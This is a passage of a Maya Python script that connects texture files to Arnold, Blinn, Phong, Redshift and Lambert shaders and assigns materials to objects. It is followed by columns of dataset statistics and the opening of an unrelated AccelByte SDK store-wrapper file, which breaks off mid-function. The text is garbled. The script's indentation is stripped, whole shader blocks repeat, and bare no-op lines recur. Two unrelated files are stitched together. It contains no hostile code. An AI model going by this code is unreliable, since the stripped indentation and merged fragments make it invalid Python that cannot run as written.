if same_name == False:
ior_func2('.refl_ior')
if opacity_text in i:
cut = i.partition('_' + opacity_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2('.opacity_color')
if same_name == False:
opacity_func2('.opacity_color')
if 'opacity' in i:
cut = i.partition('_opacity')
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2('.opacity_color')
if same_name == False:
opacity_func2('.opacity_color')
#lambert
elif cmds.nodeType(selected_shader) == 'lambert':
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
my_array[0] = '.color'
my_array[7] = '.transparency'
connected_1 = cmds.listConnections(selected_shader + my_array[0])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
names = cmds.ls(selection = True, type = 'file')
if default_shader == lambert:
for i in names:
if color_text in i:
cut = i.partition('_Base_' + color_text)
same_name = False
for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(lambert, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if color_alt_text in i:
cut = i.partition('_' + color_alt_text)
same_name = False
for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(lambert, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if normal_text in i:
cut = i.partition('_' + normal_text)
same_name = False
for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_4
same_name = True
normal_func2()
if same_name == False:
normal_func2()
if opacity_text in i:
cut = i.partition('_' + opacity_text)
same_name = False
for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
if 'opacity' in i:
cut = i.partition('_opacity')
same_name = False
for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
else:
cmds.warning('Please select your file(s) and a shader.')
# First Directory
for i in directory:
if '.png' in i or '.jpg' in i or '.jpeg' in i or '.tga' in i or '.tif' in i or 'raw' in i:
place2d = cmds.shadingNode('place2dTexture', asUtility = True)
text_file = cmds.shadingNode('file', isColorManaged = True, asTexture = True, name = i[:-4])
cmds.connectAttr(place2d +'.outUV', text_file + '.uvCoord')
cmds.setAttr(text_file + '.fileTextureName', basePath + '/' + i, type = 'string')
cmds.connectAttr(place2d +'.outUvFilterSize',text_file + '.uvFilterSize')
connections = ['rotateUV','offset','noiseUV','vertexCameraOne','vertexUvThree','vertexUvTwo','vertexUvOne',
'repeatUV','wrapV','wrapU','stagger','mirrorU','mirrorV','rotateFrame','translateFrame','coverage']
for c in connections:
cmds.connectAttr(place2d + '.' + c, text_file + '.' + c)
#Arnold
if cmds.nodeType(selected_shader) == 'aiStandardSurface':
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
connected_1 = cmds.listConnections(selected_shader + my_array[0])
connected_2 = cmds.listConnections(selected_shader + my_array[1])
connected_3 = cmds.listConnections(selected_shader + my_array[2])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_5 = cmds.listConnections(selected_shader + my_array[4])
connected_6 = cmds.listConnections(selected_shader + my_array[5])
connected_7 = cmds.listConnections(selected_shader + my_array[6])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
connect_2 = cmds.listConnections(selected_shader2 + my_array[1])
connect_3 = cmds.listConnections(selected_shader2 + my_array[2])
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
connect_5 = cmds.listConnections(selected_shader2 + my_array[4])
connect_6 = cmds.listConnections(selected_shader2 + my_array[5])
connect_7 = cmds.listConnections(selected_shader2 + my_array[6])
connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
names = cmds.ls(selection = True, type = 'file')
if default_shader == arnold:
for i in names:
if color_text in i:
cut = i.partition('_Base_' + color_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2('.baseColor')
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(arnold, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2('.baseColor')
if color_alt_text in i:
cut = i.partition('_' + color_alt_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2('.baseColor')
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(arnold, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2('.baseColor')
if roughness_text in i:
cut = i.partition( '_' + roughness_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_2
same_name = True
roughness_func2()
if same_name == False:
roughness_func2()
if roughness_alt_text in i:
cut = i.partition( '_' + roughness_alt_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_2
same_name = True
roughness_func2()
if same_name == False:
roughness_func2()
if metal_text in i:
cut = i.partition('_' + metal_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2('.metalness')
if same_name == False:
metal_func2('.metalness')
if metal_alt_text in i:
cut = i.partition('_' + metal_alt_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2('.metalness')
if same_name == False:
metal_func2('.metalness')
if normal_text in i:
cut = i.partition('_' + normal_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_4
same_name = True
normal_func2()
if same_name == False:
normal_func2()
if scatter_text in i:
cut = i.partition('_' + scatter_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_5
same_name = True
scatter_func2('.subsurface')
if same_name == False:
scatter_func2('.subsurface')
if emissive_text in i:
cut = i.partition('_' + emissive_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_6
same_name = True
emissive_func2('.emissionColor')
if same_name == False:
emissive_func2('.emissionColor')
if ior_text in i:
cut = i.partition('_' + ior_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_7
same_name = True
ior_func2('.specularIOR')
if same_name == False:
ior_func2('.specularIOR')
if 'Ior' in i:
cut = i.partition('_Ior')
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_7
same_name = True
ior_func2('.specularIOR')
if same_name == False:
ior_func2('.specularIOR')
if 'IOR' in i:
cut = i.partition('_IOR')
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_7
same_name = True
ior_func2('.specularIOR')
if same_name == False:
ior_func2('.specularIOR')
if opacity_text in i:
cut = i.partition('_' + opacity_text)
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2('.opacity')
if same_name == False:
opacity_func2('.opacity')
if 'opacity' in i:
cut = i.partition('_opacity')
same_name = False
for b in arnold_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2('.opacity')
if same_name == False:
opacity_func2('.opacity')
#Blinn
elif cmds.nodeType(selected_shader) == 'blinn':
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
my_array[0] = '.color'
my_array[2] = '.reflectivity'
my_array[7] = '.transparency'
connected_1 = cmds.listConnections(selected_shader + my_array[0])
connected_3 = cmds.listConnections(selected_shader + my_array[2])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
connect_3 = cmds.listConnections(selected_shader2 + my_array[2])
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
names = cmds.ls(selection = True, type = 'file')
if default_shader == blinn:
for i in names:
if color_text in i:
cut = i.partition('_Base_' + color_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(blinn, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if color_alt_text in i:
cut = i.partition('_' + color_alt_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(blinn, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if metal_text in i:
cut = i.partition('_' + metal_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2()
if same_name == False:
metal_func2()
if metal_alt_text in i:
cut = i.partition('_' + metal_alt_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2()
if same_name == False:
metal_func2()
if normal_text in i:
cut = i.partition('_' + normal_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_4
same_name = True
normal_func2()
if same_name == False:
normal_func2()
if opacity_text in i:
cut = i.partition('_' + opacity_text)
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
if 'opacity' in i:
cut = i.partition('_opacity')
same_name = False
for b in blinn_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
#Phong
elif cmds.nodeType(selected_shader) == 'phong':
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
my_array[0] = '.color'
my_array[2] = '.reflectivity'
my_array[7] = '.transparency'
connected_1 = cmds.listConnections(selected_shader + my_array[0])
connected_3 = cmds.listConnections(selected_shader + my_array[2])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
connect_3 = cmds.listConnections(selected_shader2 + my_array[2])
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
names = cmds.ls(selection = True, type = 'file')
if default_shader == phong:
for i in names:
if color_text in i:
cut = i.partition('_Base_' + color_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(phong, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if color_alt_text in i:
cut = i.partition('_' + color_alt_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(phong, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if metal_text in i:
cut = i.partition('_' + metal_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2()
if same_name == False:
metal_func2()
if metal_alt_text in i:
cut = i.partition('_' + metal_alt_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2()
if same_name == False:
metal_func2()
if normal_text in i:
cut = i.partition('_' + normal_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_4
same_name = True
normal_func2()
if same_name == False:
normal_func2()
if opacity_text in i :
cut = i.partition('_' + opacity_text)
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
if 'opacity' in i:
cut = i.partition('_opacity')
same_name = False
for b in phong_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
#RedshiftMaterial
elif cmds.nodeType(selected_shader) == 'RedshiftMaterial':
my_array = ['.diffuse_color','.refl_roughness','.refl_metalness','.bump_input',
'.ms_amount', '.emission_color', '.refl_ior', '.opacity_color']
connected_1 = cmds.listConnections(selected_shader + my_array[0])
connected_2 = cmds.listConnections(selected_shader + my_array[1])
connected_3 = cmds.listConnections(selected_shader + my_array[2])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_5 = cmds.listConnections(selected_shader + my_array[4])
connected_6 = cmds.listConnections(selected_shader + my_array[5])
connected_7 = cmds.listConnections(selected_shader + my_array[6])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
connect_2 = cmds.listConnections(selected_shader2 + my_array[1])
connect_3 = cmds.listConnections(selected_shader2 + my_array[2])
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
connect_5 = cmds.listConnections(selected_shader2 + my_array[4])
connect_6 = cmds.listConnections(selected_shader2 + my_array[5])
connect_7 = cmds.listConnections(selected_shader2 + my_array[6])
connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
names = cmds.ls(selection = True, type = 'file')
if default_shader == redshift:
for i in names:
if color_text in i:
cut = i.partition('_Base_' + color_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2('.diffuse_color')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(redshift, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2('.diffuse_color')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if color_alt_text in i:
cut = i.partition('_' + color_alt_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2('.diffuse_color')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(redshift, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2('.diffuse_color')
cmds.setAttr(selected_shader2 + '.refl_brdf', default_BRDF)
if roughness_text in i:
cut = i.partition( '_' + roughness_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_2
same_name = True
roughness_func2('.refl_roughness')
if same_name == False:
roughness_func2('.refl_roughness')
if roughness_alt_text in i:
cut = i.partition( '_' + roughness_alt_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_2
same_name = True
roughness_func2('.refl_roughness')
if same_name == False:
roughness_func2('.refl_roughness')
if metal_text in i:
cut = i.partition('_' + metal_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2('.refl_metalness')
cmds.setAttr(selected_shader2 + '.refl_fresnel_mode', 2)
if same_name == False:
metal_func2('.refl_metalness')
cmds.setAttr(selected_shader2 + '.refl_fresnel_mode', 2)
if metal_alt_text in i:
cut = i.partition('_' + metal_alt_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_3
same_name = True
metal_func2('.refl_metalness')
cmds.setAttr(selected_shader2 + '.refl_fresnel_mode', 2)
if same_name == False:
metal_func2('.refl_metalness')
cmds.setAttr(selected_shader2 + '.refl_fresnel_mode', 2)
if normal_text in i:
cut = i.partition('_' + normal_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_4
same_name = True
rs_normal_func2()
if same_name == False:
rs_normal_func2()
if scatter_text in i:
cut = i.partition('_' + scatter_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_5
same_name = True
scatter_func2('.ms_amount')
if same_name == False:
scatter_func2('.ms_amount')
if emissive_text in i:
cut = i.partition('_' + emissive_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_6
same_name = True
emissive_func2('.emission_color')
if same_name == False:
emissive_func2('.emission_color')
if ior_text in i:
cut = i.partition('_' + ior_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_7
same_name = True
ior_func2('.refl_ior')
if same_name == False:
ior_func2('.refl_ior')
if 'Ior' in i:
cut = i.partition('_Ior')
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_7
same_name = True
ior_func2('.refl_ior')
if same_name == False:
ior_func2('.refl_ior')
if 'IOR' in i:
cut = i.partition('_IOR')
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_7
same_name = True
ior_func2('.refl_ior')
if same_name == False:
ior_func2('.refl_ior')
if opacity_text in i:
cut = i.partition('_' + opacity_text)
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2('.opacity_color')
if same_name == False:
opacity_func2('.opacity_color')
if 'opacity' in i:
cut = i.partition('_opacity')
same_name = False
for b in redshift_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2('.opacity_color')
if same_name == False:
opacity_func2('.opacity_color')
#lambert
elif cmds.nodeType(selected_shader) == 'lambert':
my_array = ['.baseColor','.specularRoughness','.metalness','.normalCamera',
'.subsurface', '.emissionColor', '.thinFilmIOR', '.opacity']
my_array[0] = '.color'
my_array[7] = '.transparency'
connected_1 = cmds.listConnections(selected_shader + my_array[0])
connected_4 = cmds.listConnections(selected_shader + my_array[3])
connected_8 = cmds.listConnections(selected_shader + my_array[7])
connect_1 = cmds.listConnections(selected_shader2 + my_array[0])
connect_4 = cmds.listConnections(selected_shader2 + my_array[3])
connect_8 = cmds.listConnections(selected_shader2 + my_array[7])
names = cmds.ls(selection = True, type = 'file')
if default_shader == lambert:
for i in names:
if color_text in i:
cut = i.partition('_Base_' + color_text)
same_name = False
for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(lambert, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if color_alt_text in i:
cut = i.partition('_' + color_alt_text)
same_name = False
for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_1
same_name = True
color_func2()
if same_name == False:
if material_suffix in cut[0]:
obj_shad_name = cut[0]
else:
obj_shad_name = cut[0] + material_suffix
selected_shader2 = cmds.shadingNode(lambert, asShader = True, name = obj_shad_name)
if cut[0] in selected_shader2:
extra = cmds.listConnections(selected_shader2 + '.outColor')
shadingEngine2 = cmds.sets(name = default_shadingEngine, empty=True, renderable=True, noSurfaceShader=True)
cmds.connectAttr(selected_shader2 + '.outColor', shadingEngine2 + '.surfaceShader')
color_func2()
if normal_text in i:
cut = i.partition('_' + normal_text)
same_name = False
for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_4
same_name = True
normal_func2()
if same_name == False:
normal_func2()
if opacity_text in i:
cut = i.partition('_' + opacity_text)
same_name = False
for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
if 'opacity' in i:
cut = i.partition('_opacity')
same_name = False
for b in lambert_shaders:
if cut[0] in b:
selected_shader2 = b
connect_8
same_name = True
opacity_func2()
if same_name == False:
opacity_func2()
else:
cmds.warning('Please select your file(s) and a shader.')
while counter < number_of_shaders:
delete_shader(shaders_list[counter], shaders_color_list[counter])
counter = counter + 1
arnold_final_shaders = cmds.ls(type = arnold)
blinn_final_shaders = cmds.ls(type = blinn)
phong_final_shaders = cmds.ls(type = phong)
redshift_final_shaders = cmds.ls(type = redshift)
lambert_final_shaders = cmds.ls(type = lambert)
object_suf_len = len(object_suffix)
object_names = cmds.ls(type = 'transform')
shader_arnold_len = len(arnold_final_shaders)
shader_blinn_len = len(blinn_final_shaders)
shader_phong_len = len(phong_final_shaders)
shader_redshift_len = len(redshift_final_shaders)
shader_lambert_len = len(lambert_final_shaders)
var = 0
if object_material_connect == True:
if default_shader == arnold:
while var < shader_arnold_len:
for b in object_names:
c = b.partition(object_suffix)[0]
# get materails names and its shader to sets
if c in arnold_final_shaders[var]:
#find out for b and use that instead
test = cmds.listConnections((arnold_final_shaders[var]) + '.outColor')[0]
cmds.select(b)
check = cmds.sets(e = True, forceElement = test)
var = var + 1
elif default_shader == blinn:
while var < shader_blinn_len:
for b in object_names:
c = b.partition(object_suffix)[0]
# get materails names and its shader to sets
if c in blinn_final_shaders[var]:
#find out for b and use that instead
test = cmds.listConnections((blinn_final_shaders[var]) + '.outColor')[0]
cmds.select(b)
check = cmds.sets(e = True, forceElement = test)
var = var + 1
elif default_shader == phong:
while var < shader_phong_len:
for b in object_names:
c = b.partition(object_suffix)[0]
# get materails names and its shader to sets
if c in phong_final_shaders[var]:
#find out for b and use that instead
test = cmds.listConnections((phong_final_shaders[var]) + '.outColor')[0]
cmds.select(b)
check = cmds.sets(e = True, forceElement = test)
var = var + 1
elif default_shader == redshift:
while var < shader_redshift_len:
for b in object_names:
c = b.partition(object_suffix)[0]
# get materails names and its shader to sets
if c in redshift_final_shaders[var]:
#find out for b and use that instead
test = cmds.listConnections((redshift_final_shaders[var]) + '.outColor')[0]
cmds.select(b)
check = cmds.sets(e = True, forceElement = test)
var = var + 1
elif default_shader == lambert:
while var < shader_lambert_len:
for b in object_names:
c = b.partition(object_suffix)[0]
# get materails names and its shader to sets
if c in lambert_final_shaders[var]:
#find out for b and use that instead
test = cmds.listConnections((lambert_final_shaders[var]) + '.outColor')[0]
cmds.select(b)
check = cmds.sets(e = True, forceElement = test)
var = var + 1
| 54.511196
| 152
| 0.416151
| 16,428
| 199,620
| 4.809593
| 0.025931
| 0.042728
| 0.046069
| 0.016036
| 0.921328
| 0.906622
| 0.901218
| 0.897408
| 0.893611
| 0.888941
| 0
| 0.020452
| 0.517473
| 199,620
| 3,661
| 153
| 54.526086
| 0.799838
| 0.014818
| 0
| 0.926656
| 0
| 0.000308
| 0.059178
| 0.001463
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012327
| false
| 0.007088
| 0.001233
| 0
| 0.013559
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d681b180707b5c199da20928e46278c39d5f325f
| 14,438
|
py
|
Python
|
accelbyte_py_sdk/api/platform/wrappers/_store.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | null | null | null |
accelbyte_py_sdk/api/platform/wrappers/_store.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | 1
|
2021-10-13T03:46:58.000Z
|
2021-10-13T03:46:58.000Z
|
accelbyte_py_sdk/api/platform/wrappers/_store.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2021 AccelByte Inc. All Rights Reserved.
# This is licensed software from AccelByte Inc, for limitations
# and restrictions contact your company contract manager.
#
# Code generated. DO NOT EDIT!
# template file: justice_py_sdk_codegen/__main__.py
# pylint: disable=duplicate-code
# pylint: disable=line-too-long
# pylint: disable=missing-function-docstring
# pylint: disable=missing-function-docstring
# pylint: disable=missing-module-docstring
# pylint: disable=too-many-arguments
# pylint: disable=too-many-branches
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-lines
# pylint: disable=too-many-locals
# pylint: disable=too-many-public-methods
# pylint: disable=too-many-return-statements
# pylint: disable=too-many-statements
# pylint: disable=unused-import
from typing import Any, Dict, List, Optional, Tuple, Union
from ....core import HeaderStr
from ....core import get_namespace as get_services_namespace
from ....core import run_request
from ....core import run_request_async
from ....core import same_doc_as
from ..models import ErrorEntity
from ..models import StoreBackupInfo
from ..models import StoreCreate
from ..models import StoreInfo
from ..models import StoreUpdate
from ..models import ValidationErrorEntity
from ..operations.store import CloneStore
from ..operations.store import CreateStore
from ..operations.store import DeletePublishedStore
from ..operations.store import DeleteStore
from ..operations.store import ExportStore
from ..operations.store import GetPublishedStore
from ..operations.store import GetPublishedStoreBackup
from ..operations.store import GetStore
from ..operations.store import ImportStore
from ..operations.store import ListStores
from ..operations.store import PublicListStores
from ..operations.store import RollbackPublishedStore
from ..operations.store import UpdateStore
@same_doc_as(CloneStore)
def clone_store(store_id: str, target_store_id: Optional[str] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = CloneStore.create(
store_id=store_id,
target_store_id=target_store_id,
namespace=namespace,
)
return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(CloneStore)
async def clone_store_async(store_id: str, target_store_id: Optional[str] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = CloneStore.create(
store_id=store_id,
target_store_id=target_store_id,
namespace=namespace,
)
return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(CreateStore)
def create_store(body: Optional[StoreCreate] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
if namespace is None:
namespace, error = get_services_namespace()
if error:
return None, error
request = CreateStore.create(
body=body,
namespace=namespace,
)
